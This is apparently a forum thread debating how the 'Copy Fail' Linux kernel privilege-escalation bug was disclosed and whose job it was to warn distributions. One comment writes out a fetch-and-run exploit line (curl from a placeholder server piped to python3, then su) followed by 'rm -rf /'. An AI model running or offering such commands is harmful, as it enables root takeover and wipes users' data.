the real problem is:
>It's also worrying that it seems there's no communication between the kernel security team and distribution maintainers.
the reporter should not be the one responsible for reporting separately to every single downstream of the thing they found a vuln in.
what should be happening, as you allude to, is a communication channel between the kernel security team and distribution maintainers. they are in a much better position to coordinate and communicate with the maintainers than random reporters are.
the minute the patch landed in the kernel, a notification should have gone out from the kernel team to a curated list of distro security folk that communicated the importance of the patch, and that the public disclosure would be in 30 days.
Not "separately to every single downstream", there is the "linux-distros" mailing list for disclosures: https://oss-security.openwall.org/wiki/mailing-lists/distros
This random blogpost from 2022 serves as a proof that disclosing kernel vulnerabilities to the distros list is a well-known practice: https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-...
I agree it's a shame that the process isn't more streamlined and the kernel developers aren't forwarding the reports to the distros list.
They are professional security researchers, they must know this is the way it is done in the ecosystem.
Kicking the can around leads nowhere.
just as a note, its not as simple as firing off an email to linux-distros and calling it a day.
qualys, one of the big firms (10,000+ customers across 130 countries), has even taken a stance against emailing linux-distros because of the restrictions and policies involved:
> Although contacting the linux-distros list has been clearly beneficial
> (they have thoroughly reviewed and tested the patches, and were able to
> prepare their kernel updates beforehand), we have reached the conclusion
> that it has become increasingly difficult to coordinate the disclosure
> of kernel vulnerabilities with both groups (the Linux kernel security
> team and the linux-distros list), because they have very different
> policies. From now on, we will coordinate the disclosure of kernel
> vulnerabilities with the Linux kernel security team only. We also
> apologize in advance for this.It’s certainly a thing some people do. But there is not a unified consensus on how to handle vulnerabilities. Different security researchers (or, in fact, the same researchers releasing different findings) can and do take many different courses of action.
The kernel devs patched the kernel. The kernel devs have a pretty known, straightforward stance in how they ship fixes for anything, because anything in the kernel can be a security problem.
Distro maintainers can see kernel changes. Some distros aggressively track new changes. Others backport what they feel are relevant. Others don’t do either.
Users pick what distro they use, and how they set up their infra.
Maybe if I were paying for RHEL licenses I’d be eyeballing the money I pay and RHEL’s response time.
But the ownership here lies with system operators, who pick their infrastructure, who design their security model, and who build their operational workflows. This vuln is a great example: people who looked at shared untrusted workloads on a single kernel and said “Hell no” had a much calmer day than teams who thought that was a good idea.
In terms of something actionable, and maybe someone more well versed in how the distros work can tell me why this is a bad idea, but shouldn't there be a documented process and channel for critical CVE's to be bubbled out to distro maintainers who then have some sort of SLA for patching them and sending them downstream to end users? Perhaps incentives are not aligned to produce this outcome.
Otherwise, it’s on the end user. Distro volunteers don’t owe you anything. Kernel devs don’t owe you anything.
I don’t care about what would be the most effective way of doing things. I care about what folks involved actually owe to each other, and distro volunteers don’t owe users any kind of active chasing of remediation due to the user’s threat model.
The idea of making some kind of streamlined process that solves what you didn’t like about this vulnerability’s remediation is that it ignores basically all the complexity. Like “what about distros that don’t abide by embargoes” or “what distros count as ones that matter” or “what about all the vulns that aren’t in Linux, they’re in software that’s packaged across many operating systems”.
If you want that, buy a commercial distro of linux, or use Windows. That's a huge part of Microsoft's value proposition to enterprise - they pay people to stay on top of security patches for you. Same with RedHat and others.
Expecting anything of unpaid volunteers is unreasonable.
> THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
This vulnerability is, for some threat models, a really big deal. A security group found the vulnerability. They disclosed it. It was patched.
Folks here have gotten all kinds of bent out of shape that the groups involved didnt do things in the way each internet commenter would have liked. But this is the system working.
This vulnerability is, for other threat models, a death sentence.
> A security group found the vulnerability. They disclosed it. It was patched.
It was patched only after some people who should have been notified well in advance happened to notice something was up. That is NOT HOW IT'S SUPPOSED TO WORK.
For as long as the unpatched window remains open, skids will mess around and break things. Organized crime teams will use it for some really nasty hacking/ransomware/exfil/extortion/whatever. I guarantee you, this vuln is powerful and widespread enough that intel orgs will use it to kill targets, if they haven't already been using it for years. And if they have, we can just bank on them pulling out all the stops to take advantage of the remaining time for wreaking havoc. Make a project out of it and see if you can guess some of the future headlines.
Certain folks might not care much because they are citizens of one or more of those orgs' nations, so those targets are welcome to die in their opinion. That's fine. You do you, I'll do me, we'll all just go on doing our thing. But it's all fun and games until the wrong target gets hit and now there's a pact between the Germans and the Austrians being invoked and a few dozen million Europeans die. Or a geopolitical hotspot flares up and overnight 20% of the global petroleum supply chain grinds to a halt. Use your imagination. This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.
How is this different from any other day? Because now we've got a world-changing vuln out in the wild with no distro mitigation on day 1, and who the hell knows how many unscrupulous actors poised to take advantage of it before the fun and games stops. There will be no adults in the room when the miscreants decide to deploy while they still can.
Is this vuln going to start the next world war? Probably not. I don't expect it to and I hope and pray it doesn't. But leaving a vuln like this undisclosed to the very people whose job it is to protect us all is playing with fire. Not matches; more like a 10-grams-less-than-critical mass of plutonium.
sam is right to be pissed and he's doing a very good job of hiding it, because he knows that his users are at the mercy of TPTB in the Linux kernel world. Somebody's head needs to roll for this, and I don't mean some dude the CIA wants to hax0r because he's next on the list.
A Linux LPE is a nothingburger unless you’re relying on the Linux kernel to enforce internal security boundaries, which would simply be foolish.
Now, y'all tell me, since I'm not a web guy. How hard is it going to be to tweak this lovely little pathogen into some kind of browser exploit? It just needs to be combined with a sandbox escape to work on current versions, right? Difficult but quite worth investing the time and effort to develop if that's your line of business. If that happens, every at-risk Tails user is going to have to stay offline for a while, unless they want to play the drone lottery.
Or how about chaining it with any of the as-yet unpatched bugs in gawd-only-knows how many web services out there that have poor input sanitization code? That bug now graduates from a DoS crash causer to a root grab. Good luck stopping it with your fancy AI Behavioral Analysis security tools. They better be fast. The sploit is going to do its work in two packets, maybe three. Fun times.
Lucky for us systems monkeys, it's not like anybody is spending billions of dollars to develop vuln finding AI tools right at this very second. So there shouldn't be many unpatched web services holes.
Oh, wait.
Of course, as the grey hats can already tell you, the really delicious part of this thing is how it's going to become the LPE tool of first resort for any APT that's already inside ur base killin ur doodz.
Nothingburger? This nothingburger is going to root a million OS instances before we know what hit us.
cat | python3 && su
<puke>, Ctrl-D
And I'm sure it can be refined into something much more likable to the spooky types, if they haven't already done it.People who run servers that give out shell access to uses or randos already needed to contend with this.
Added later: you may find https://gtfobins.org/ fascinating or horrifying.
$ curl http://my.server.ip.addr/copy_fail_exp.py | python3 && su
# rm -rf / &
25 seconds if I type it out by hand instead of copypasta. Sigh.Otherwise it’s not.
Not sure what the solution could/should be, but surely there could be a better, easier mechanism for kernel to advise all distro maintainers who care, and for those distro maintainers to subscribe in some way. Whether any distro maintainers do so (let alone do something about the vuln notifications) would be entirely up to them. There could also be some easier way for end users to see what the distros' policies on this are, such that they can take that into account when selecting a distro.
We don’t have to agree, but the site rules are pretty clear that swipes like that aren’t ok.
That kind of distro maintainers and kernel devs communication path already exists: the linux-distros@ mailing list. But since anybody can read it, posting “hey everybody, this is a security patch” has basically the same effect as the security researcher posting, in terms of disclosing the vuln to bad actors.
Given that anybody can make a Linux distro, and Linux distros aren’t generally either capable or interested in background checking their teams or policing their individual security practice, it doesn’t seem possible to have a communication channel that distros can sign up for that lacks this problem.
There's not really an enforcement mechanism in FOSS like there is in capitalism world, it just comes down to what we want our part of the world to look like. So I think we'd think more clearly if we leave aside the ideas like "who owes who what." I think it's fun to imagine what sort of motivations and incentives there are if we put away the money ones.
Nonsensical string of words with no meaning.
If you want something that someone else isn't giving you, you have the option to try to do it yourself, or try to compel someone else to give you what you want somehow. Feel free to idk pay someone to track the kernel list and 4000 others and send you heads-ups? Try to pass a law to make people do what you want since you don't care about words like "owe"?
Yes, exactly, the opposite of paying, since when you pay someone something they owe you whatever you paid for.
If we leave aside owe, deserve, and earn, we can start discussing things like what we want our kernel ecosystem to look like, how we can make it safer, etc, without being burdened by these concepts.
It's a simple intellectual exercise, that's all. If you're having a strong reaction to it, imo that'd make it even more fun for you to participate.
You want someone to do something for you for some other reason than that they owe you.
They already are doing something for you that they don't owe you. They are writing software that you benefit from. You just want them (or somebody) to do something else that they don't owe you.
They aren't, because they don't owe you and it's not something they want to do for fun, and so since the problem is they don't owe you, you wish to set aside words like "owe".
Well sure. Looks like you found the problem and the solution alright. Why didn't anyone else think of that?
If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?
Do you imagine say a dating website where people compete to look attractive by getting points by doing the best job at finding the most bugs and patches and reporting them to the most downstream consumers the fastest?
Exactly! That's what I'm interested in exploring.
> If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?
That's what I love exploring. Action with no obligation. Have you any examples of that in your life? Nobody obligates me to do the long walks I enjoy where I stick a 360 camera on my head and then upload the footage to Mapillary and other open platforms, I just like to do it, and I want to find other things that I'm motivated to do without obligation, and I'm fascinated by things people do for "no reason." Understanding human motivation is really important to me for some reason.
As to "what then," yes what then? If I run a cashless commune, how do we make sure the toilets get cleaned? That's the whole question, and I love exploring it. If you'd like to experience it yourself, you could always try attending a regional Burn for a bit of a micro version of it, people doing things just for the sake of it.
I'm sorry, I don't quite understand what you mean by the dating app thing.
Who decides who is a trustworthy distro maintainer? In the open source world everyone is equal, no favorites are chosen. If your point is that the distros backed by companies making at least $x million revenue a year should get priority disclosure... pretty sure somebody will take issue with this.
And it's not like a hypothetical issue either. Given the high stakes, bad actors are highly incentivized to masquerade as some small scale niche distro until they get their effectively free zero day CVE.
Linux like every open source project is just a bunch of people who are YOLOing it. Not something you use for your fortune 500 critical mission infrastructure.
But from what I understand they were not given enough information to know if it was relevant or not. The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.
If the commit message says it fixes a security bug, then bad actors immediately know there's a possible exploit there. So maybe it's intentional? (not familiar with the policy for this)
They dropped the ball when the shipped supposedly secure systems where their method for getting alerted to security updates was "hope people reporting to upstream will also notice a mailing list that will alert them".
(Caveat: Distro's like Ubuntu advertise security updates so this is on them. I'm not sure Gentoo does that, if they don't well then no one dropped the ball because no one represented that Gentoo got prompt security updates).
"There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly."
“30 days should be enough time” why? Why is 30 days a magic number? Especially in open source.
Yeah it isn’t the researchers problem to tell every distributor of the kernel about the fix or verify that everyone has the fix, but fuck maybe wait until at least someone has the fix and maybe don’t drop it on a Friday. That is just malicious
But, even if I agreed with you, how do you propose they tell the patchers this that doesn’t tell the whole world?
And they dropped it on a Wednesday.
If researchers want to showcase their ability (either individually or as an organization) to identify and address security vulnerabilities in complex multi-stakeholder environments, I very much expect them to figure this out. After all, it doesn't make much sense if a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions, so that identified issues are resolved with minimal impact to the business.
These vendor interactions you're referring to are the company's customers, correct? Are you proposing the company hire another company to manage getting updates to their customers?
Feels like the more sensible process would be for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability and for distro maintainers to pay attention to that. Could be done without revealing what the vulnerability actually is in most cases, trusting the kernel maintainer's judgement. There does seem to be a public linux-cve-announce mailing list.
Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.
People have gotten so used to the Github flavour of free-labour, social-network-style FOSS that they've forgotten what all those LICENSE files actually say, which is to make it explicitly clear that the devs are not responsible to you for your issues, up to and including the software setting your house on fire. If you don't like it, you don't have to use it.
They can't, because (responsible) security disclosures are private, _not public_. That's the whole point of the system: notify the developers in private ahead of time (usually 30, 60 or 90 days) so they can write, test and roll-out the fixes before you release the info to the whole world. This is to minimize the time between when bad actors gain access to the exploits vs. when users install the patch. So "keeping up on security disclosures" cannot ever be a 'pull' process.
Usually the maintainers of the big distros are part of (private) security mailinglists and receive such info. Just not in this case it seems.
Sending emails to some big distros would still result with e.g. Gentoo not getting that info because they are not a big distro.
Not ideal, but also: shit happens? It's always a balancing act choosing the lesser of multiple evils and most of the time it seems to work ok-ish, which is probably the best we can hope for ;-P
For this specific "bug" they took care to not mention any security angle in the commit message, making it extremely hard for an outsider to even realize this was a critical patch. I assume this was because they wanted to push the fix without breaking embargo.
The post you are responding to says that it would be nice if they copied literally one mailing list.
Who would curate that list though? You don't need permission from the kernel team to spin up a new distro. I can go and create fork of Debian or Arch or whatever today and the kernel team would never know (and neither should they).
This is completely in the responsibility of the distros. If you don't like this model, use something like FreeBSD.
You don't need anyone's permission to make a distro, that's true, but if you notify Debian, Canonical, Fedora, Red Hat and Arch you're covering a very large fraction of users; way more than today's 0%. In cases like this, perfect is the enemy of the good.
The name is a misnomer.
Given this was announced when backports weren't ready (and given the POC was at least opaque if not obfuscated), I'm getting the vibe fixing the vuln wasn't as high as a priority as making a media splash.
> Note that for Linux kernel vulnerabilities, unless the reporter chooses > to bring it to the linux-distros ML, there is no heads-up to > distributions.
so, no, `linux-distros` list don't solve the problem.
They openly refuse to do this and have been given authority by MITRE to work against any such process.
There would be a lot of people gloating if this happened to MS.
Linux is a free kernel that literally revolutionized the computing landscape.
There are only 2 words in this term, and neither one even slightly applies.
A sacred cow is called a sacred cow because there is no reason for it to be sacred.
Linux is perfectly subject to criticism, and so not at all sacred.
Linux has earned a stunning amount of respect and gratitude by actually providing stunning utility and quality. IE, it's not just a random object like a cow that everyone decided to worship for no reason.
Spoken as a freebsd user who has plenty of critiques of the entire linux ecosystem.
I agree.
> A sacred cow is called a sacred cow because there is no reason for it to be sacred.
Here we diverge. Linux earns sacred cow status when people interpret legitimate criticism of it as an attack that must be debunked or dismissed. And there's plenty of that happening in this forum; you may not be treating it as a sacred cow, but plenty of people are.
And to expound on why it even matters, it does a disservice to Linux to treat it this way: if you can't engage with its flaws, you'll never help fix them, and instead attack people who try.
It's 2026. We're more than 30 years into the Linux ecosystem. I don't believe this bullshit for a moment.
Given how trivially users can implement mitigation, distributions could have done _something_ to protect their users prior to publication date. A handful of messages is all that was required, not "every single downstream" - that is a straw man.
The publication of a bug that trivially gains root on an incredible number of Linux installs that was discovered using an A.I. tool prior to any of the "downstreams" implementing a fix is intentional. I speculate the motivation is free promotion of the A.I. tool.
yeah, distributions could be following the kernel updates more closely and they would have been patched prior to publication. mainline was patched 30 days before publication.
it is not the reporter's responsibility to babysit the linux distributions.
It is not the responsibility of the initial reporter to communicate to distributions, but the fact that those responsible failed to do that, doesn't give everybody else a free pass.
The thing is, malicous actors are already monitoring most major projects and doing either source analysis or binary analysis to figure out if changes were made to patch a vulnerability. So, as soon as you actually patch, you really need to disclose because all you're doing by not disclosing the vulnerability is handing the bad actors a free go. The black hats already know. You need to tell the white hats, too, so they can patch.
Requiring the security researcher to do it is insane. Should a security researcher that identifies a vulnerability in electron.js need to identify every possible project using electron.js to communicate with them the vulnerability exists? No. That's absurd.
FTFA:
> I see that on the 11th of April 6.19.12 & 6.18.22 were released with the fix backported.
> Longterm 6.12, 6.6, 6.1, 5.15, 5.10 have not received the fix and I don't see anything in the upstream stable queues yet as I write.
I wouldn't go so far as to call this "the kernel devs patched it". Virtually none of the kernels that distro's are actually using today have received a fix. This looks like an extremely lackluster response from the kernel security team.
Pretty much the only non-rolling distro's that are shipping a fixed kernel are Fedora 44 and Ubuntu 26.04, both released in the last few weeks. Their previous releases both shipped with Linux 6.17 which is still vulnerable today!
But it's been at least 15 years since "reversing means patches are effectively disclosures legible mostly to attackers" became a norm in software security. And that was for closed-source software (most notably Windows). The norms are even laxer for open source.
But this is a false comparison, right? The scope of "Linux distributions" and "electron apps" are orders of magnitude different. If the reporter spot checked one or two of the most popular distributions to see if fixes had been adopted, that seems like an extra level of nice diligence before publicizing the details.
It doesn't seem "insane" as much as "not the most efficient path" as has already been well argued. But it also doesn't seem unreasonable to think in a project of the scope of the Linux kernel, with the potential impact of fairly effective(?) privilege escalation, some extra consideration is reasonable--certainly not "insane" at the very least?
About half the thread we're on reads as if the commenters believe Xint made this vulnerability. They did not: they alerted you to it. It was already there.
> Their job is to bring information to light, not to manage downstreams.
The researchers are also members of a community in which more harm than is necessary may be dealt by their actions. Nuance must exist in evaluating "reasonable" and "responsible" in the context of actions.
If it helps you out any, even though my logic was absolutely the same and just as categorical in 2012 as it is today: there are now multiple automated projects that run every merged Linux commit through frontier models to scope them (the status quo ante of the patch) out for exploitability, and then add them to libraries of automatically-exploitable bugs.
People here are just mad that they heard about the bug. Serious attackers had this the moment it hit the kernel. This whole debate is kind of farcical. It's about a "real time" response this week to a disaster that struck a month ago.
they did it in the established industry standard way that probably every single security researcher you can think of follows (for good reason, i would add).
whoever did the marketing on "responsible disclosure" was a genius.
tptacek says it much better than me: ""Responsible disclosure" is an Orwellian term cooked up between @Stake and Microsoft and other large vendors to coerce researchers into synchronizing with vendor release schedules."
And it's not as if I'm asking for a lot of effort. One mail to the security team of a popular distro "hey, we have found this LPE that we'll release with exploit next week, it's patched upstream already in this commit, but you don't seem to have picked it up" would likely have been enough.
The problem is that vendors and developers have repeatedly shown that if you give them an inch, they take a mile. Look at exactly what happened with BlueHammer this month. The security researcher went full disclosure because Microsoft didn't listen to their reports.
Disclosure is vital. It's essential. Because the truth is, if a security researcher has found it, it's extremely likely that it's already been found by either black hats or by state actors. Ignorance is not actually protection from exploitation.
The security researcher also has a responsibility to the general public that is still actively using vulnerable software in ignorance. They need to be protected from vendor and developer negligence as well as from exploits. And the only way to protect yourself from an exploit that hasn't yet been patched is to know that it is there.
I'm also not proposing delaying the disclosure to the general public at all. They already waited 30 days with that, that's fine. Just look a bit further than your checklist of only contacting upstream, and send a mail to the distributions if they haven't picked it up a week or two before.
[citation needed]
Is there any evidence that Linux distros (specifically) act in this way? Or a particular distro?
there is ~3 decades of citations you can look at, spread out over every security mailing list, security conference, etc. that you can think of.
one decent start is https://projectzero.google/vulnerability-disclosure-faq.html...
"Prior to Project Zero our researchers had tried a number of different disclosure policies, such as coordinated vulnerability disclosure. [...] "We used this model of disclosure for over a decade, and the results weren’t particularly compelling. Many fixes took over six months to be released, while some of our vulnerability reports went unfixed entirely! We were optimistic that vendors could do better, but we weren’t seeing the improvements to internal triage, patch development, testing, and release processes that we knew would provide the most benefit to users.
[...]
While every vulnerability disclosure policy has certain pros and cons, Project Zero has concluded that a 90-day disclosure deadline policy is currently the best option available for user security. Based on our experiences with using this policy for multiple years across thousands of vulnerability reports, we can say that we’re very satisfied with the results.
[...]
For example, we observed a 40% faster response time from one software vendor when comparing bugs reported against the same target over a 7-year period, while another software vendor doubled the regularity of their security updates in response to our policy."
>Linux distros (specifically) act in this way
carving out special exceptions based on nebulous criteria is a bad idea. 90+30 is what has been settled on, and mostly works.
Because I would call a situation where the development team fails to appreciate the severity of a security vulnerability and has an established procedure that requires the researcher and not the kernel team to communicate with downstream users is already a major failure of process. Security is not just patching the vulnerability, and it seems that the Linux kernel developers or the Linux kernel security team does not understand that.
This is the result of that failure.
If this were any other software, we'd be here with pitchforks and torches. The researcher gave the developers timed disclosure, and even waited until after the developers had patched the issue. And... it's still a problem.
the linux kernel team is in a 10000% better position to communicate to and coordinate their downstreams. it seems completely backwards to me to suggest that the reporter should be responsible for figuring out every possible downstream and opening up separate reports to each of them.
the kernel team should have a process/channel to say "this is important! disclosure is in 30 days" that is received by distro security teams. because this is not the first or last time the kernel will have a local privilege escalation. hoping that every reporter, forever in the future, will take the onus on themselves is a recipe for disapointment.
Gentoo has to take some blame too for not keeping all the kernels they maintain patched in a timely way.
How do you figure that? From what I could tell from the earlier post, the fix has only been backported to 6.18 and later, and as TFA indicates the distro's were not informed of the security implications of this fix. All distro's shipping a major kernel version from more than a year ago -- and that includes all LTS kernels -- are vulnerable, regardless of how "timely" their patch schedules follow upstream.
the baddies are looking at every patch anyways.
Even if the only purpose of looking at the status to make yourself look good in marketing materials, it's surprising that it didn't happen.
the vulnerability report was submitted to the kernel security team and appropriate kernel maintainers. those are the people responsible for patching the kernel, which they did 30 days ago.
They patched 2 of 7 supported kernels.
is the reporter of that vulnerability responsible for finding and submitting a vulnerability report to every single piece of software that uses left-pad? all ~millions of them?
or do they submit the report to left-pad, get them to fix it at the source, and trust that the people relying on left-pad will update their software like they should when they see a security-relevant update is available?
Those groups don't exist, to my knowledge. And probably can't, realistically speaking.
> Is your software AI-era safe?
> Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. [...]
> [Try Xint Code]
More chaos makes their product seem even more attractive.
I get put into a read-only dashboard with ZERO info. is this live? is this static? how do I use it? the API button just leads me to a swagger doc.
this was a failure of the kernel security team, and their stance on communicating security issues with their downstreams.
Hell, Crowdstrike is still purchased.
Sure, they have no legal obligation to disclose, but we all also have no legal obligation to buy their services. Blacklisting bad actors like this is the right move to discourage this kind of behavior.
they did a proper coordinated disclosure, following the industry standard 90+30 process. that is why the exploit dropped 30 days after the patch landed.
the kernel team should have communicated with their downstream about the importance of the patch. that is the kernel security team's responsibility -- and they are much better positioned to do that than crossing your fingers and hoping every reporter will contact every distro every single time there is a vulnerability.
there are very good reasons disclosure works this way, backed by a couple of decades of debate about it.
I just don't see the point in complaining about how shirking the norms of your industry will make you look irresponsible. I don't really care that they could have decided to sell the vulnerability instead. It isn't material.
Tavis Ormandy dropped Zenbleed right onto Twitter. He's doing fine. You can blacklist him if you want; I imagine he's not going to notice.
There is actually no way to give them a friendly heads up, and then do your own thing. The only way not to be bound is by not sending them any notification at all...
I couldn't find a public copy of that.
The best starting point I found for reporting vulnerabilities was: https://github.com/microsoft/MSRC-Security-Research/security...
You can email without agreeing to anything. But for a serious issue Microsoft would obviously try and track down who you are and what jurisdiction you are in.
> MICROSOFT BOUNTY TERMS & CONDITIONS
> Last updated: July 23, 2025
> The Microsoft Bug Bounty Programs Terms and Conditions ("Terms") cover your participation in the Microsoft Bug Bounty Program (the "Program"). These Terms are between you and Microsoft Corporation ("Microsoft," "us" or "we"). By submitting any vulnerabilities to Microsoft or otherwise participating in the Program in any manner, you accept these Terms.
Who knows if its enforceable.
Those private actors aren't planning to sit around and hold onto these exploits they've horded forevermore, they're obviously paying for them so they can one day use them.
We must get public funds to reward ethical disclosure of big impact vulns like this.
Mostly cover citizens within a very limited set of jurisdictions.
Otherwise there's a chance at extradition.
This is not true in many jurisdictions.
We need an anonymous bounty system.
If so, that's a bit naive. In the actual world, that buyer wants to buy more stuff from me, not penalize me.
And they absolutely have a moral obligation to do things in a way to minimize damage and impact to other people's systems. (I'm not saying "responsible disclosure" is the correct way to do that, but hoarding vulnerabilities and exploits and selling them to the highest bidder certainly isn't.)
This is how society needs to work.
Or at least went dark ..
You'll learn who the buyers are if you routinely have the really good stuff to sell! If you are offering iOS zero click on a semi-regular basis, the buyer is going to want to try to deal with you directly and preferably offer you a more regular form of employment, if you are interested. Some national governments may offer certain benefits to you, depending on your situation.
All depends on what you have to offer. If you were able to offer this https://arstechnica.com/security/2025/09/microsofts-entra-id... or something of that magnitude, a lot of problems in your life would just go away. The buyers would all be Five Eyes and the intelligence gain of having that kind of access even briefly is priceless.
In a more Western-centric context, imagine if you had a flaw like that, same 'no logs are generated' and 'every single customer account is accessible' but the impacted vendor was Alibaba Cloud. The researcher would get to name their price. That's the real world, that's the world we share. We shouldn't be blind to that.
it wasn't sold for profit, it was openly disclosed.
> And they absolutely have a moral obligation to do things in a way to minimize damage and impact to other people's systems.
All that "responsible disclosure" does is keep people from demanding better.
Uh... no? If you mean legally, some people might, depending on jurisdiction. But also, ethically? yes, researchers are ethically obligated to disclose responsibly.
> Just fyi.
...
> Be glad it was disclosed at all. Be glad a patch was available prior to release.
I am glad that a patch was available. Equally I can be glad that the linux community is strong enough to respond quickly, while also being angry that this person behaves unethically.
Likewise, when people in my industry behave poorly, or unethically; I'm now the person ethically obligated to both point it out, and condemn it. Not to become an apologist demanding I should be happy watching bad things happen, when much of the fallout could have been prevented with a bit less incompetence and ignorance.
I'm so glad these so called "researchers" aren't totally evil, I'm so grateful they're only half evil, give them a lollipop.
Whatever, the way they disclosed it isn't much different from no disclosure at all - the exploit would have been identified in the wild and fixed soon thereafter.
"Researchers"...
non-security people always seem to get up in arms about it, but there is very good reasons why the industry has landed on the process it has, which has been hashed out over a few decades.
1. Status quo. Researchers are free to disclose to a vendor, free to sell vulns to legitimate companies, free to do full disclosure if they want. This situation benefits security. Researchers are able to pay their bills while also doing meaningful research into OSS projects that are unable to fund the kind of security audit they need. Harm reduction, of sorts.
2. Everyone is a bad actor. No one is going to do this work for free/for a bounty. Horrible flaws will be found and shared with ransomware gangs and the like. 0day will sell for a percentage of the ransom winnings. Researchers will live like kings, everyone else will suffer.
Which do you prefer?
If it won’t be handled through criminal law then it’ll be handled through civil litigation: Anyone who was exploited as a result of this disclosure should sue the discloser for contributing to the damage they’ve suffered.
In that world, the vulnerability has more value to those who seek to exploit it for their own motives, regardless of the consequences. They hope that no one else stumbles on it and fixes it, preventing them from continuing to use it to do bad things.
In the world where it is disclosed, there is more value in fixing the vulnerability as the maintainer’s reputation is at risk (and potentially monetary loss or legal liability if they are shown to be negligent).
> In computer security, coordinated vulnerability disclosure (CVD, sometimes known as responsible disclosure)
I guess you can learn something new after 36 years.
If you are referring to what you quoted, your pedantry and sharpshooting would result in an incomplete English sentence: "that's why we have the responsible disclosure" is missing a noun. Now that we are firmly in worthless pedantry:
Protocol (n):
1.a. a system of rules that explain the correct conduct and procedures to be followed in formal situations
1.b. a set of conventions governing the treatment and especially the formatting of data in an electronic communications system
If you don't like what I said or disagree, poke holes in factual inaccuracies. However, in the reality that I am pretty sure we all share, responsible disclosure is a well established protocol that is followed by many security researchers, and was imperfectly followed here.
> You: No, I wouldn't, because my own preferences are towards immediate disclosure.
And there it is. You could have said "I don't think responsible disclosure is a good idea" and moved on, but now we have whatever the fuck this is.
Bluffing sure as hell beats incapable of being wrong. I'll take it.
As a user and admin I disagree. Makes one appreciate what a masterful bit of lexical-engineering “Responsible” Disclosure is, kinda like “Secure” (from me, not forme) Boot — “Responsible” Disclosure is 100% about reputation-management for the various corporation/foundation middleman entities sitting between me and my computer.
Those groups don't care that my individual computer is vulnerable but about nobody being able to say “RHEL is vulnerable” or “Ubuntu is vulnerable”. The vulnerability exists for me either way, and I'd rather have the chance to know about it and minimize risk than to be surprised by the fix and hope nothing bad happened in that meantime.
Immediate public disclosure is the only choice that isn't irresponsible as far as I'm concerned.
Even when there is no known use case of the attack (other than the security researcher's)?
> The vulnerability exists for me either way, and I'd rather have the chance to know about it and minimize risk
By the time you hear about it, the money could be gone because 1000 hackers heard about it from the researcher before you did.
> than to be surprised by the fix and hope nothing bad happened in that meantime.
Hope is not a good strategy here.
What could possibly go wrong?
And do you agree with that behaviour?
The real debate here is what went wrong with getting that info downstream, and whose responsibility was that?
No, it's really not.
High severity vulnerabilities are responsibly handled by quietly neutralising them with subtle patches that do not reveal the vulnerability, waiting for those patches to distribute. Then patching or removing the root cause of the vulnerability (at which point opportunists will start to notice), and finally publicly disclosing it when there are already good mitigations in place.
Example: spectre/meltdowm mitigations.
I've been asked to use this approach myself when reaching out to maintainers. Sometimes it's possible to directly fix the vulnerability as a "side effect" by making a legitimate adjacent change.
That’s what you’re saying here.
https://x.com/spendergrsec/status/2049566830771970483
https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...
Or is everyone expected to upgrade and reboot every 48 hours for all eternity and just deal with potential regressions all the time?
I think this reflects poorly on the original reporters. If you have a weaponized 700-byte universal local root exploit script ready to go, perhaps you should coordinate with major distros for patches to be available before unleashing it on the world. No matter how "veteran" you are.
(This bug does not technically require a reboot to mitigate).
It's a category error to talk about a disclosure event like this as something that would destabilize someone's fleet operations. The Linux kernel is fallible. So is the x64 architecture. You already have to be ready to lock things down and reboot (or mitigate) at a moment's notice.
Remember: whatever else grumpy sysadmins have to say about this, Xint are the good guys. Contrast them with the bad guys, who have vulnerabilities just as bad as CopyFail, but aren't disclosing them at all --- you only find out about them when it's discovered they're actively be exploited. There's no patch at all. There isn't even a characterization of how they work, so that you could quickly see what to seccomp. That's the actual threat environment serious Linux shops operate in.
LPEs are not rare.
As soon as a patch is committed, the clock starts ticking, the exploit will be discovered by reverse engineering recent commits. The commit was made on April 1st, Xint disclosed it on the 29th. If the Kernel Security team had wanted to, they had 28 days to backport patches in the LTS branches...
So, I wouldn't put any blame on Xint there.
Opportunists are the ones who will sell a 0day to bad guys. Or who will drop a 0day publicly to promote their services. And they’ll fight tooth and nail against any actual legal obligation to engage in responsible and coordinated disclosure, because they make more money without that.
Using quotes around something where you’re actually doing a strawman paraphrase of another commenter you disagree with is bad form.
Ubuntu/RHEL is vulnerable and so are most Linux users by extension.
I absolutely 100% agree with this and I'm glad to see somebody saying it. Any system that is one LPE away from being compromised is already insecure.
The only important system that uses it as a security boundary is Android and there is mitigated by the fact that APKs need user approval, plus strict SELinux and seccomp policy plus the GrapheneOS hardening, and in this case the mitigations succeeded (https://discuss.grapheneos.org/d/35110-grapheneos-is-protect...)
On Hyperbola GNU/Linux, they will shift into OpenBSD, they got fed up with the corporate slopware (and propietary Linux became). They will still make Hyperbola BSD GNU-license compatible, from core to the userland tools.
In my case, I wish Emacs and GNU developers embraced plotutils and left out Gnuplot (is not GNU at all; worse, it conflicts with the GPL) and made Texinfo independent of LaTeX to produce PDF and HTML files with equations. Groff + troff+pic+eqn already do that, no Texlive needed. So can mandoc under OpenBSD, no magic needed, everything under few MB's.
